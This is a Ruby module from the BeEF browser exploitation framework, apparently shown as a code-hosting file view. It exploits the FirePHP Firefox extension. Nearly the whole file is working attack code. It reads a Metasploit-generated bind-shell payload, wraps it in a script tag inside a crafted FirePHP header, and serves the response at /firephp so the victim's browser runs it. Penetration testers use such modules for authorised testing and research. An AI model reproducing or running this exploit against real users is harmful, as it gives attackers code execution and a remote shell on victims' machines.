60 lines
1.8 KiB
Ruby
60 lines
1.8 KiB
Ruby
#
|
|
# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
|
|
# Browser Exploitation Framework (BeEF) - http://beefproject.com
|
|
# See the file 'doc/COPYING' for copying permission
|
|
###
|
|
# PoC by Wireghoul: http://www.justanotherhacker.com/advisories/jahx132.html
|
|
###
|
|
class Firephp_code_exec < BeEF::Core::Command
|
|
|
|
def pre_send
|
|
rand_str = rand(32**10).to_s(32)
|
|
|
|
# load payload.js file
|
|
# generate payload:
|
|
# msfpayload firefox/shell_bind_tcp LPORT=4444 R > payload.js
|
|
payload = ""
|
|
f = File.open("#{$root_dir}/modules/exploits/firephp/payload.js")
|
|
f.each_line do |line|
|
|
payload << line
|
|
end
|
|
f.close
|
|
|
|
# construct exploit+payload HTTP response
|
|
exploit = {
|
|
"RequestHeaders" => {
|
|
"1"=>"#{rand(10)}",
|
|
"2"=>"#{rand(10)}",
|
|
"3"=>"#{rand(10)}",
|
|
"4"=>"#{rand(10)}",
|
|
"5"=>"#{rand(10)}",
|
|
"6"=>"#{rand(10)}",
|
|
"7"=>"#{rand(10)}",
|
|
"8"=>"#{rand(10)}",
|
|
"9"=>"#{rand(10)}",
|
|
"<script>#{payload}<\/SCRIPT>" => rand_str
|
|
}
|
|
}.to_json
|
|
|
|
# mount exploit+payload at /firephp
|
|
# @todo use Router class instead of bind_raw()
|
|
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_raw('200',
|
|
{
|
|
'Content-Type' => 'text/html',
|
|
'X-Wf-Protocol-1' => 'http://meta.wildfirehq.org/Protocol/JsonStream/0.2',
|
|
'X-Wf-1-Plugin-1' => 'http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3',
|
|
'X-Wf-1-Structure-1' => 'http://meta.firephp.org/Wildfire/Structure/FirePHP/Dump/0.1',
|
|
'X-Wf-1-1-1-1' => "#{exploit.length}|#{exploit}|\r\n"
|
|
},
|
|
rand_str, # HTTP body
|
|
'/firephp', # URI mount point
|
|
-1
|
|
)
|
|
end
|
|
|
|
def post_execute
|
|
save({'result' => @datastore['result']})
|
|
end
|
|
|
|
end
|